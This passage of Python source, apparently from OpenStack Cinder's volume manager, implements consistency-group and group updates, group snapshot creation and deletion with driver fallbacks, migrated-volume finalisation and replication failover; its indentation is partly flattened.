def _update_group_generic(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates a group."""
# NOTE(xyang): The volume manager adds/removes the volume to/from the
# group in the database. This default implementation does not do
# anything in the backend storage.
return None, None, None
def update_consistencygroup(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates consistency group.
Update consistency group by adding volumes to the group,
or removing volumes from the group.
"""
add_volumes_ref = []
remove_volumes_ref = []
add_volumes_list = []
remove_volumes_list = []
if add_volumes:
add_volumes_list = add_volumes.split(',')
if remove_volumes:
remove_volumes_list = remove_volumes.split(',')
for add_vol in add_volumes_list:
try:
add_vol_ovo = objects.Volume.get_by_id(context, add_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update consistency group "
"failed to add volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': add_vol},
resource={'type': 'consistency_group',
'id': group.id})
raise
if add_vol_ovo.status not in VALID_ADD_VOL_TO_CG_STATUS:
msg = (_("Cannot add volume %(volume_id)s to consistency "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': add_vol_ovo.id,
'group_id': group.id,
'status': add_vol_ovo.status,
'valid': VALID_ADD_VOL_TO_CG_STATUS})
raise exception.InvalidVolume(reason=msg)
self._check_is_our_resource(add_vol_ovo)
add_volumes_ref.append(add_vol_ovo)
for remove_vol in remove_volumes_list:
try:
remove_vol_ref = self.db.volume_get(context, remove_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update consistency group "
"failed to remove volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': remove_vol},
resource={'type': 'consistency_group',
'id': group.id})
raise
if remove_vol_ref['status'] not in VALID_REMOVE_VOL_FROM_CG_STATUS:
msg = (_("Cannot remove volume %(volume_id)s from consistency "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': remove_vol_ref['id'],
'group_id': group.id,
'status': remove_vol_ref['status'],
'valid': VALID_REMOVE_VOL_FROM_CG_STATUS})
raise exception.InvalidVolume(reason=msg)
remove_volumes_ref.append(remove_vol_ref)
self._notify_about_consistencygroup_usage(
context, group, "update.start")
try:
utils.require_driver_initialized(self.driver)
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_consistencygroup(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
if add_volumes_update:
for update in add_volumes_update:
self.db.volume_update(context, update['id'], update)
if remove_volumes_update:
for update in remove_volumes_update:
self.db.volume_update(context, update['id'], update)
if model_update:
if model_update['status'] in (
[fields.ConsistencyGroupStatus.ERROR]):
msg = (_('Error occurred when updating consistency group '
'%s.') % group.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
group.update(model_update)
group.save()
except exception.VolumeDriverException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred in the volume driver when "
"updating consistency group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'status': 'error'})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'status': 'error'})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred when updating consistency "
"group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'status': 'error'})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'status': 'error'})
now = timeutils.utcnow()
group.status = 'available'
group.update_at = now
group.save()
for add_vol in add_volumes_ref:
self.db.volume_update(context, add_vol['id'],
{'consistencygroup_id': group.id,
'updated_at': now})
for rem_vol in remove_volumes_ref:
self.db.volume_update(context, rem_vol['id'],
{'consistencygroup_id': None,
'updated_at': now})
self._notify_about_consistencygroup_usage(
context, group, "update.end")
LOG.info(_LI("Update consistency group "
"completed successfully."),
resource={'type': 'consistency_group',
'id': group.id})
def update_group(self, context, group,
add_volumes=None, remove_volumes=None):
"""Updates group.
Update group by adding volumes to the group,
or removing volumes from the group.
"""
add_volumes_ref = []
remove_volumes_ref = []
add_volumes_list = []
remove_volumes_list = []
if add_volumes:
add_volumes_list = add_volumes.split(',')
if remove_volumes:
remove_volumes_list = remove_volumes.split(',')
for add_vol in add_volumes_list:
try:
add_vol_ref = objects.Volume.get_by_id(context, add_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update group "
"failed to add volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': add_vol_ref.id},
resource={'type': 'group',
'id': group.id})
raise
if add_vol_ref.status not in VALID_ADD_VOL_TO_GROUP_STATUS:
msg = (_("Cannot add volume %(volume_id)s to "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': add_vol_ref.id,
'group_id': group.id,
'status': add_vol_ref.status,
'valid': VALID_ADD_VOL_TO_GROUP_STATUS})
raise exception.InvalidVolume(reason=msg)
self._check_is_our_resource(add_vol_ref)
add_volumes_ref.append(add_vol_ref)
for remove_vol in remove_volumes_list:
try:
remove_vol_ref = objects.Volume.get_by_id(context, remove_vol)
except exception.VolumeNotFound:
LOG.error(_LE("Update group "
"failed to remove volume-%(volume_id)s: "
"VolumeNotFound."),
{'volume_id': remove_vol_ref.id},
resource={'type': 'group',
'id': group.id})
raise
if (remove_vol_ref.status not in
VALID_REMOVE_VOL_FROM_GROUP_STATUS):
msg = (_("Cannot remove volume %(volume_id)s from "
"group %(group_id)s because volume is in an invalid "
"state: %(status)s. Valid states are: %(valid)s.") %
{'volume_id': remove_vol_ref.id,
'group_id': group.id,
'status': remove_vol_ref.status,
'valid': VALID_REMOVE_VOL_FROM_GROUP_STATUS})
raise exception.InvalidVolume(reason=msg)
remove_volumes_ref.append(remove_vol_ref)
self._notify_about_group_usage(
context, group, "update.start")
try:
utils.require_driver_initialized(self.driver)
try:
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_group(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group.group_type_id != cgsnap_type['id']:
model_update, add_volumes_update, remove_volumes_update = (
self._update_group_generic(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
else:
cg, remove_volumes_ref = self._convert_group_to_cg(
group, remove_volumes_ref)
model_update, add_volumes_update, remove_volumes_update = (
self.driver.update_consistencygroup(
context, group,
add_volumes=add_volumes_ref,
remove_volumes=remove_volumes_ref))
self._remove_consistencygroup_id_from_volumes(
remove_volumes_ref)
if add_volumes_update:
self.db.volumes_update(context, add_volumes_update)
if remove_volumes_update:
self.db.volumes_update(context, remove_volumes_update)
if model_update:
if model_update['status'] in (
[fields.GroupStatus.ERROR]):
msg = (_('Error occurred when updating group '
'%s.') % group.id)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
group.update(model_update)
group.save()
except exception.VolumeDriverException:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred in the volume driver when "
"updating group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
add_vol.status = 'error'
add_vol.save()
self._remove_consistencygroup_id_from_volumes(
remove_volumes_ref)
for rem_vol in remove_volumes_ref:
rem_vol.status = 'error'
rem_vol.save()
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error occurred when updating "
"group %(group_id)s."),
{'group_id': group.id})
group.status = 'error'
group.save()
for add_vol in add_volumes_ref:
add_vol.status = 'error'
add_vol.save()
for rem_vol in remove_volumes_ref:
rem_vol.status = 'error'
rem_vol.save()
group.status = 'available'
group.save()
for add_vol in add_volumes_ref:
add_vol.group_id = group.id
add_vol.save()
for rem_vol in remove_volumes_ref:
rem_vol.group_id = None
rem_vol.save()
self._notify_about_group_usage(
context, group, "update.end")
LOG.info(_LI("Update group completed successfully."),
resource={'type': 'group',
'id': group.id})
    def create_cgsnapshot(self, context, cgsnapshot):
        """Creates the cgsnapshot.

        Drives the backend to snapshot every volume in the consistency
        group, persists per-snapshot model updates, copies glance
        metadata for bootable volumes, and marks the cgsnapshot
        'available' (or 'error' and re-raises on failure).

        :param context: request context (elevated internally)
        :param cgsnapshot: the CGSnapshot object to create
        :returns: the updated CGSnapshot object
        """
        caller_context = context
        context = context.elevated()
        LOG.info(_LI("Cgsnapshot %s: creating."), cgsnapshot.id)
        snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
            context, cgsnapshot.id)
        self._notify_about_cgsnapshot_usage(
            context, cgsnapshot, "create.start")
        snapshots_model_update = None
        model_update = None
        try:
            utils.require_driver_initialized(self.driver)
            LOG.debug("Cgsnapshot %(cgsnap_id)s: creating.",
                      {'cgsnap_id': cgsnapshot.id})
            # Pass context so that drivers that want to use it, can,
            # but it is not a requirement for all drivers.
            cgsnapshot.context = caller_context
            for snapshot in snapshots:
                snapshot.context = caller_context
            model_update, snapshots_model_update = (
                self.driver.create_cgsnapshot(context, cgsnapshot,
                                              snapshots))
            if snapshots_model_update:
                for snap_model in snapshots_model_update:
                    # Update db for snapshot.
                    # NOTE(xyang): snapshots is a list of snapshot objects.
                    # snapshots_model_update should be a list of dicts.
                    self.db.snapshot_update(context,
                                            snap_model['id'],
                                            snap_model)
                    # Propagate any per-snapshot failure to the cgsnapshot.
                    if (snap_model['status'] in [
                        fields.SnapshotStatus.ERROR_DELETING,
                        fields.SnapshotStatus.ERROR] and
                            model_update['status'] not in
                            ['error_deleting', 'error']):
                        model_update['status'] = snap_model['status']
            if model_update:
                if model_update['status'] == 'error':
                    msg = (_('Error occurred when creating cgsnapshot '
                             '%s.') % cgsnapshot.id)
                    LOG.error(msg)
                    raise exception.VolumeDriverException(message=msg)
                cgsnapshot.update(model_update)
                cgsnapshot.save()
        except exception.CinderException:
            with excutils.save_and_reraise_exception():
                cgsnapshot.status = 'error'
                cgsnapshot.save()
                # Update snapshot status to 'error' if driver returns
                # None for snapshots_model_update.
                if not snapshots_model_update:
                    for snapshot in snapshots:
                        snapshot.status = fields.SnapshotStatus.ERROR
                        snapshot.save()
        for snapshot in snapshots:
            volume_id = snapshot['volume_id']
            snapshot_id = snapshot['id']
            vol_ref = self.db.volume_get(context, volume_id)
            # Bootable volumes carry glance metadata the snapshot needs in
            # order to restore a bootable volume later.
            if vol_ref.bootable:
                try:
                    self.db.volume_glance_metadata_copy_to_snapshot(
                        context, snapshot_id, volume_id)
                except exception.GlanceMetadataNotFound:
                    # If volume is not created from image, No glance metadata
                    # would be available for that volume in
                    # volume glance metadata table
                    pass
                except exception.CinderException as ex:
                    LOG.error(_LE("Failed updating %(snapshot_id)s"
                                  " metadata using the provided volumes"
                                  " %(volume_id)s metadata"),
                              {'volume_id': volume_id,
                               'snapshot_id': snapshot_id})
                    # TODO(thangp): Switch over to use snapshot.update()
                    # after cgsnapshot-objects bugs are fixed
                    self.db.snapshot_update(
                        context, snapshot_id, {
                            'status': fields.SnapshotStatus.ERROR})
                    raise exception.MetadataCopyFailure(
                        reason=six.text_type(ex))
            self.db.snapshot_update(context,
                                    snapshot['id'],
                                    {'status': fields.SnapshotStatus.AVAILABLE,
                                     'progress': '100%'})
        cgsnapshot.status = 'available'
        cgsnapshot.save()
        LOG.info(_LI("cgsnapshot %s: created successfully"),
                 cgsnapshot.id)
        self._notify_about_cgsnapshot_usage(
            context, cgsnapshot, "create.end")
        return cgsnapshot
    def create_group_snapshot(self, context, group_snapshot):
        """Creates the group_snapshot.

        Drives the backend to snapshot every volume in the group, falling
        back to the generic or legacy-CG implementation when the driver
        does not implement ``create_group_snapshot``.  Bootable volumes
        get their glance metadata copied to the new snapshots; the
        group_snapshot ends 'available' (or 'error' and re-raises).

        :param context: request context (elevated internally)
        :param group_snapshot: the GroupSnapshot object to create
        :returns: the updated GroupSnapshot object
        """
        caller_context = context
        context = context.elevated()
        LOG.info(_LI("GroupSnapshot %s: creating."), group_snapshot.id)
        snapshots = objects.SnapshotList.get_all_for_group_snapshot(
            context, group_snapshot.id)
        self._notify_about_group_snapshot_usage(
            context, group_snapshot, "create.start")
        snapshots_model_update = None
        model_update = None
        try:
            utils.require_driver_initialized(self.driver)
            LOG.debug("Group snapshot %(grp_snap_id)s: creating.",
                      {'grp_snap_id': group_snapshot.id})
            # Pass context so that drivers that want to use it, can,
            # but it is not a requirement for all drivers.
            group_snapshot.context = caller_context
            for snapshot in snapshots:
                snapshot.context = caller_context
            try:
                model_update, snapshots_model_update = (
                    self.driver.create_group_snapshot(context, group_snapshot,
                                                      snapshots))
            except NotImplementedError:
                # Fall back for drivers without generic group support.
                cgsnap_type = group_types.get_default_cgsnapshot_type()
                if group_snapshot.group_type_id != cgsnap_type['id']:
                    model_update, snapshots_model_update = (
                        self._create_group_snapshot_generic(
                            context, group_snapshot, snapshots))
                else:
                    # Convert to the legacy CG representation, call the CG
                    # API, then undo the temporary linkage.
                    cgsnapshot, snapshots = (
                        self._convert_group_snapshot_to_cgsnapshot(
                            group_snapshot, snapshots, context))
                    model_update, snapshots_model_update = (
                        self.driver.create_cgsnapshot(context, cgsnapshot,
                                                      snapshots))
                    self._remove_cgsnapshot_id_from_snapshots(snapshots)
            if snapshots_model_update:
                for snap_model in snapshots_model_update:
                    # Update db for snapshot.
                    # NOTE(xyang): snapshots is a list of snapshot objects.
                    # snapshots_model_update should be a list of dicts.
                    snap_id = snap_model.pop('id')
                    snap_obj = objects.Snapshot.get_by_id(context, snap_id)
                    snap_obj.update(snap_model)
                    snap_obj.save()
                    # Propagate any per-snapshot failure to the
                    # group_snapshot.
                    if (snap_model['status'] in [
                        fields.SnapshotStatus.ERROR_DELETING,
                        fields.SnapshotStatus.ERROR] and
                            model_update['status'] not in
                            ['error_deleting', 'error']):
                        model_update['status'] = snap_model['status']
            if model_update:
                if model_update['status'] == 'error':
                    msg = (_('Error occurred when creating group_snapshot '
                             '%s.') % group_snapshot.id)
                    LOG.error(msg)
                    raise exception.VolumeDriverException(message=msg)
                group_snapshot.update(model_update)
                group_snapshot.save()
        except exception.CinderException:
            with excutils.save_and_reraise_exception():
                group_snapshot.status = 'error'
                group_snapshot.save()
                # Update snapshot status to 'error' if driver returns
                # None for snapshots_model_update.
                self._remove_cgsnapshot_id_from_snapshots(snapshots)
                if not snapshots_model_update:
                    for snapshot in snapshots:
                        snapshot.status = fields.SnapshotStatus.ERROR
                        snapshot.save()
        for snapshot in snapshots:
            volume_id = snapshot.volume_id
            snapshot_id = snapshot.id
            vol_obj = objects.Volume.get_by_id(context, volume_id)
            # Bootable volumes carry glance metadata the snapshot needs in
            # order to restore a bootable volume later.
            if vol_obj.bootable:
                try:
                    self.db.volume_glance_metadata_copy_to_snapshot(
                        context, snapshot_id, volume_id)
                except exception.GlanceMetadataNotFound:
                    # If volume is not created from image, No glance metadata
                    # would be available for that volume in
                    # volume glance metadata table
                    pass
                except exception.CinderException as ex:
                    LOG.error(_LE("Failed updating %(snapshot_id)s"
                                  " metadata using the provided volumes"
                                  " %(volume_id)s metadata"),
                              {'volume_id': volume_id,
                               'snapshot_id': snapshot_id})
                    snapshot.status = fields.SnapshotStatus.ERROR
                    snapshot.save()
                    raise exception.MetadataCopyFailure(
                        reason=six.text_type(ex))
            snapshot.status = fields.SnapshotStatus.AVAILABLE
            snapshot.progress = '100%'
            snapshot.save()
        group_snapshot.status = 'available'
        group_snapshot.save()
        LOG.info(_LI("group_snapshot %s: created successfully"),
                 group_snapshot.id)
        self._notify_about_group_snapshot_usage(
            context, group_snapshot, "create.end")
        return group_snapshot
def _create_group_snapshot_generic(self, context, group_snapshot,
                                   snapshots):
    """Create every member snapshot of a group_snapshot via the driver.

    Generic fallback for drivers without native group-snapshot support:
    each snapshot is created individually with ``driver.create_snapshot``.

    :returns: tuple of (group model update dict, list of per-snapshot
              model update dicts); any per-snapshot failure marks both
              that snapshot and the whole group as ``'error'``.
    """
    group_update = {'status': 'available'}
    per_snapshot_updates = []
    for snap in snapshots:
        snap_update = {'id': snap.id}
        try:
            self.driver.create_snapshot(snap)
        except Exception:
            # One failed snapshot poisons the whole group's status.
            snap_update['status'] = 'error'
            group_update['status'] = 'error'
        else:
            snap_update['status'] = 'available'
        per_snapshot_updates.append(snap_update)
    return group_update, per_snapshot_updates
def _delete_group_snapshot_generic(self, context, group_snapshot,
                                   snapshots):
    """Delete every member snapshot of a group_snapshot via the driver.

    Generic fallback for drivers without native group-snapshot support.

    :returns: tuple of (group model update dict, list of per-snapshot
              model update dicts). A busy snapshot stays 'available';
              any other failure marks the snapshot and group 'error'.
    """
    group_update = {'status': group_snapshot.status}
    per_snapshot_updates = []
    for snap in snapshots:
        snap_update = {'id': snap.id}
        try:
            self.driver.delete_snapshot(snap)
        except exception.SnapshotIsBusy:
            # Busy means it still exists and is usable -- not an error.
            snap_update['status'] = 'available'
        except Exception:
            snap_update['status'] = 'error'
            group_update['status'] = 'error'
        else:
            snap_update['status'] = 'deleted'
        per_snapshot_updates.append(snap_update)
    return group_update, per_snapshot_updates
def delete_cgsnapshot(self, context, cgsnapshot):
    """Delete a consistency-group snapshot and all member snapshots.

    Calls the driver to delete the cgsnapshot, reconciles any per-snapshot
    status updates the driver returns, releases quota reservations for
    each member snapshot, and finally destroys the cgsnapshot record.

    :raises: exception.VolumeDriverException if the driver reports an
             error status for the group.
    """
    caller_context = context
    # Elevated context for DB/driver work; the caller's original context
    # is preserved and handed to drivers that want it.
    context = context.elevated()
    project_id = cgsnapshot.project_id
    LOG.info(_LI("cgsnapshot %s: deleting"), cgsnapshot.id)
    snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
        context, cgsnapshot.id)
    self._notify_about_cgsnapshot_usage(
        context, cgsnapshot, "delete.start")
    snapshots_model_update = None
    model_update = None
    try:
        utils.require_driver_initialized(self.driver)
        LOG.debug("cgsnapshot %(cgsnap_id)s: deleting",
                  {'cgsnap_id': cgsnapshot.id})
        # Pass context so that drivers that want to use it, can,
        # but it is not a requirement for all drivers.
        cgsnapshot.context = caller_context
        for snapshot in snapshots:
            snapshot.context = caller_context
        model_update, snapshots_model_update = (
            self.driver.delete_cgsnapshot(context, cgsnapshot,
                                          snapshots))
        if snapshots_model_update:
            for snap_model in snapshots_model_update:
                # NOTE(xyang): snapshots is a list of snapshot objects.
                # snapshots_model_update should be a list of dicts.
                snap = next((item for item in snapshots if
                             item.id == snap_model['id']), None)
                if snap:
                    snap.status = snap_model['status']
                    snap.save()
                # Propagate a per-snapshot error up to the group status,
                # unless the group is already marked failed.
                if (snap_model['status'] in
                        [fields.SnapshotStatus.ERROR_DELETING,
                         fields.SnapshotStatus.ERROR] and
                        model_update['status'] not in
                        ['error_deleting', 'error']):
                    model_update['status'] = snap_model['status']
        if model_update:
            if model_update['status'] in ['error_deleting', 'error']:
                msg = (_('Error occurred when deleting cgsnapshot '
                         '%s.') % cgsnapshot.id)
                LOG.error(msg)
                raise exception.VolumeDriverException(message=msg)
            else:
                cgsnapshot.update(model_update)
                cgsnapshot.save()
    except exception.CinderException:
        with excutils.save_and_reraise_exception():
            cgsnapshot.status = 'error'
            cgsnapshot.save()
            # Update snapshot status to 'error' if driver returns
            # None for snapshots_model_update.
            if not snapshots_model_update:
                for snapshot in snapshots:
                    snapshot.status = fields.SnapshotStatus.ERROR
                    snapshot.save()
    for snapshot in snapshots:
        # Get reservations
        try:
            if CONF.no_snapshot_gb_quota:
                reserve_opts = {'snapshots': -1}
            else:
                reserve_opts = {
                    'snapshots': -1,
                    'gigabytes': -snapshot['volume_size'],
                }
            volume_ref = self.db.volume_get(context, snapshot['volume_id'])
            QUOTAS.add_volume_type_opts(context,
                                        reserve_opts,
                                        volume_ref.get('volume_type_id'))
            reservations = QUOTAS.reserve(context,
                                          project_id=project_id,
                                          **reserve_opts)
        except Exception:
            # A quota bookkeeping failure must not block the deletion.
            reservations = None
            LOG.exception(_LE("Failed to update usages deleting snapshot"))
        self.db.volume_glance_metadata_delete_by_snapshot(context,
                                                          snapshot['id'])
        # TODO(thangp): Switch over to use snapshot.destroy()
        # after cgsnapshot-objects bugs are fixed
        self.db.snapshot_destroy(context, snapshot['id'])
        # Commit the reservations
        if reservations:
            QUOTAS.commit(context, reservations, project_id=project_id)
    cgsnapshot.destroy()
    LOG.info(_LI("cgsnapshot %s: deleted successfully"), cgsnapshot.id)
    self._notify_about_cgsnapshot_usage(context, cgsnapshot, "delete.end",
                                        snapshots)
def delete_group_snapshot(self, context, group_snapshot):
    """Delete a generic group snapshot and all member snapshots.

    Prefers the driver's native delete_group_snapshot; if unimplemented,
    falls back to the generic per-snapshot path, or -- for the default
    cgsnapshot group type -- converts to a cgsnapshot and uses the
    legacy driver API. Releases quota for each snapshot and destroys
    the group_snapshot record last.

    :raises: exception.VolumeDriverException if the driver reports an
             error status for the group.
    """
    caller_context = context
    # Elevated context for DB/driver work; the caller's original context
    # is preserved and handed to drivers that want it.
    context = context.elevated()
    project_id = group_snapshot.project_id
    LOG.info(_LI("group_snapshot %s: deleting"), group_snapshot.id)
    snapshots = objects.SnapshotList.get_all_for_group_snapshot(
        context, group_snapshot.id)
    self._notify_about_group_snapshot_usage(
        context, group_snapshot, "delete.start")
    snapshots_model_update = None
    model_update = None
    try:
        utils.require_driver_initialized(self.driver)
        LOG.debug("group_snapshot %(grp_snap_id)s: deleting",
                  {'grp_snap_id': group_snapshot.id})
        # Pass context so that drivers that want to use it, can,
        # but it is not a requirement for all drivers.
        group_snapshot.context = caller_context
        for snapshot in snapshots:
            snapshot.context = caller_context
        try:
            model_update, snapshots_model_update = (
                self.driver.delete_group_snapshot(context, group_snapshot,
                                                  snapshots))
        except NotImplementedError:
            cgsnap_type = group_types.get_default_cgsnapshot_type()
            if group_snapshot.group_type_id != cgsnap_type['id']:
                model_update, snapshots_model_update = (
                    self._delete_group_snapshot_generic(
                        context, group_snapshot, snapshots))
            else:
                # Legacy path: present the group snapshot as a cgsnapshot
                # to drivers that only implement the old CG API.
                cgsnapshot, snapshots = (
                    self._convert_group_snapshot_to_cgsnapshot(
                        group_snapshot, snapshots, context))
                model_update, snapshots_model_update = (
                    self.driver.delete_cgsnapshot(context, cgsnapshot,
                                                  snapshots))
                self._remove_cgsnapshot_id_from_snapshots(snapshots)
        if snapshots_model_update:
            for snap_model in snapshots_model_update:
                # NOTE(xyang): snapshots is a list of snapshot objects.
                # snapshots_model_update should be a list of dicts.
                snap = next((item for item in snapshots if
                             item.id == snap_model['id']), None)
                if snap:
                    snap_model.pop('id')
                    snap.update(snap_model)
                    snap.save()
                # Propagate a per-snapshot error up to the group status,
                # unless the group is already marked failed.
                if (snap_model['status'] in
                        [fields.SnapshotStatus.ERROR_DELETING,
                         fields.SnapshotStatus.ERROR] and
                        model_update['status'] not in
                        ['error_deleting', 'error']):
                    model_update['status'] = snap_model['status']
        if model_update:
            if model_update['status'] in ['error_deleting', 'error']:
                msg = (_('Error occurred when deleting group_snapshot '
                         '%s.') % group_snapshot.id)
                LOG.error(msg)
                raise exception.VolumeDriverException(message=msg)
            else:
                group_snapshot.update(model_update)
                group_snapshot.save()
    except exception.CinderException:
        with excutils.save_and_reraise_exception():
            group_snapshot.status = 'error'
            group_snapshot.save()
            # Update snapshot status to 'error' if driver returns
            # None for snapshots_model_update.
            if not snapshots_model_update:
                self._remove_cgsnapshot_id_from_snapshots(snapshots)
                for snapshot in snapshots:
                    snapshot.status = fields.SnapshotStatus.ERROR
                    snapshot.save()
    for snapshot in snapshots:
        # Get reservations
        try:
            if CONF.no_snapshot_gb_quota:
                reserve_opts = {'snapshots': -1}
            else:
                reserve_opts = {
                    'snapshots': -1,
                    'gigabytes': -snapshot.volume_size,
                }
            volume_ref = objects.Volume.get_by_id(context,
                                                  snapshot.volume_id)
            QUOTAS.add_volume_type_opts(context,
                                        reserve_opts,
                                        volume_ref.volume_type_id)
            reservations = QUOTAS.reserve(context,
                                          project_id=project_id,
                                          **reserve_opts)
        except Exception:
            # A quota bookkeeping failure must not block the deletion.
            reservations = None
            LOG.exception(_LE("Failed to update usages deleting snapshot"))
        self.db.volume_glance_metadata_delete_by_snapshot(context,
                                                          snapshot.id)
        snapshot.destroy()
        # Commit the reservations
        if reservations:
            QUOTAS.commit(context, reservations, project_id=project_id)
    group_snapshot.destroy()
    LOG.info(_LI("group_snapshot %s: deleted successfully"),
             group_snapshot.id)
    self._notify_about_group_snapshot_usage(context, group_snapshot,
                                            "delete.end",
                                            snapshots)
def update_migrated_volume(self, ctxt, volume, new_volume, volume_status):
    """Finalize migration process on backend device.

    Gives the driver a chance to return model updates for the migrated
    volume; if the driver does not implement the hook, the defaults
    (_name_id and provider_location taken from new_volume) are used.
    The source volume keeps the merged defaults, while the temporary
    (new) volume record receives the source's previous values so the
    two DB rows effectively swap identities.
    """
    model_update = None
    model_update_default = {'_name_id': new_volume.name_id,
                            'provider_location':
                            new_volume.provider_location}
    try:
        model_update = self.driver.update_migrated_volume(ctxt,
                                                          volume,
                                                          new_volume,
                                                          volume_status)
    except NotImplementedError:
        # If update_migrated_volume is not implemented for the driver,
        # _name_id and provider_location will be set with the values
        # from new_volume.
        model_update = model_update_default
    if model_update:
        model_update_default.update(model_update)
        # Swap keys that were changed in the source so we keep their values
        # in the temporary volume's DB record.
        # Need to convert 'metadata' and 'admin_metadata' since
        # they are not keys of volume, their corresponding keys are
        # 'volume_metadata' and 'volume_admin_metadata'.
        model_update_new = dict()
        for key in model_update:
            if key == 'metadata':
                if volume.get('volume_metadata'):
                    model_update_new[key] = {
                        metadata['key']: metadata['value']
                        for metadata in volume.volume_metadata}
            elif key == 'admin_metadata':
                model_update_new[key] = {
                    metadata['key']: metadata['value']
                    for metadata in volume.volume_admin_metadata}
            else:
                model_update_new[key] = volume[key]
        with new_volume.obj_as_admin():
            new_volume.update(model_update_new)
            new_volume.save()
    with volume.obj_as_admin():
        volume.update(model_update_default)
        volume.save()
# Replication V2.1 and a/a method
def failover(self, context, secondary_backend_id=None):
    """Failover a backend to a secondary replication target.

    Instructs a replication capable/configured backend to failover
    to one of it's secondary replication targets. host=None is
    an acceptable input, and leaves it to the driver to failover
    to the only configured target, or to choose a target on it's
    own. All of the hosts volumes will be passed on to the driver
    in order for it to determine the replicated volumes on the host,
    if needed.

    :param context: security context
    :param secondary_backend_id: Specifies backend_id to fail over to
    """
    updates = {}
    repl_status = fields.ReplicationStatus
    svc_host = vol_utils.extract_host(self.host, 'backend')
    service = objects.Service.get_by_args(context, svc_host,
                                          constants.VOLUME_BINARY)
    volumes = self._get_my_volumes(context)
    # Assume failure until the driver call returns cleanly.
    exception_encountered = True
    try:
        # For non clustered we can call v2.1 failover_host, but for
        # clustered we call a/a failover method. We know a/a method
        # exists because BaseVD class wouldn't have started if it didn't.
        failover = getattr(self.driver,
                           'failover' if service.is_clustered
                           else 'failover_host')
        # expected form of volume_update_list:
        # [{volume_id: <cinder-volid>, updates: {'provider_id': xxxx....}},
        # {volume_id: <cinder-volid>, updates: {'provider_id': xxxx....}}]
        active_backend_id, volume_update_list = failover(
            context,
            volumes,
            secondary_id=secondary_backend_id)
        exception_encountered = False
    except exception.UnableToFailOver:
        LOG.exception(_LE("Failed to perform replication failover"))
        updates['replication_status'] = repl_status.FAILOVER_ERROR
    except exception.InvalidReplicationTarget:
        LOG.exception(_LE("Invalid replication target specified "
                          "for failover"))
        # Preserve the replication_status: Status should be failed over if
        # we were failing back or if we were failing over from one
        # secondary to another secondary. In both cases active_backend_id
        # will be set.
        if service.active_backend_id:
            updates['replication_status'] = repl_status.FAILED_OVER
        else:
            updates['replication_status'] = repl_status.ENABLED
    except exception.VolumeDriverException:
        # NOTE(jdg): Drivers need to be aware if they fail during
        # a failover sequence, we're expecting them to cleanup
        # and make sure the driver state is such that the original
        # backend is still set as primary as per driver memory
        LOG.error(_LE("Driver reported error during "
                      "replication failover."))
        updates.update(disabled=True,
                       replication_status=repl_status.FAILOVER_ERROR)
    if exception_encountered:
        LOG.error(
            _LE("Error encountered during failover on host: "
                "%(host)s invalid target ID %(backend_id)s"),
            {'host': self.host, 'backend_id':
             secondary_backend_id})
        self.finish_failover(context, service, updates)
        return
    if secondary_backend_id == "default":
        # Failing back to the primary: re-enable replication; the
        # service stays disabled only if it is frozen.
        updates['replication_status'] = repl_status.ENABLED
        updates['active_backend_id'] = ''
        updates['disabled'] = service.frozen
        updates['disabled_reason'] = 'frozen' if service.frozen else ''
    else:
        updates['replication_status'] = repl_status.FAILED_OVER
        updates['active_backend_id'] = active_backend_id
        updates['disabled'] = True
        updates['disabled_reason'] = 'failed-over'
    self.finish_failover(context, service, updates)
    for update in volume_update_list:
        # Response must include an id key: {volume_id: <cinder-uuid>}
        if not update.get('volume_id'):
            raise exception.UnableToFailOver(
                reason=_("Update list, doesn't include volume_id"))
        # Key things to consider (attaching failed-over volumes):
        # provider_location
        # provider_auth
        # provider_id
        # replication_status
        vobj = objects.Volume.get_by_id(context, update['volume_id'])
        vobj.update(update.get('updates', {}))
        vobj.save()
    LOG.info(_LI("Failed over to replication target successfully."))

# TODO(geguileo): In P - remove this
failover_host = failover
def finish_failover(self, context, service, updates):
    """Persist the outcome of a failover, locally or via RPC.

    For a clustered service the changes are mirrored onto the cluster
    record and then broadcast to every volume service (including this
    one) through the failover_completed RPC; otherwise they are simply
    saved on this service's own record.
    """
    if not service.is_clustered:
        service.update(updates)
        service.save()
        return
    # We have to update the cluster with the same data, and we do it
    # before broadcasting the failover_completed RPC call to prevent
    # races with services that may be starting.
    for attr, val in updates.items():
        setattr(service.cluster, attr, val)
    service.cluster.save()
    volume_rpcapi.VolumeAPI().failover_completed(context, service, updates)
def failover_completed(self, context, updates):
    """Finalize failover of this backend.

    When a service is clustered and replicated the failover has 2 stages,
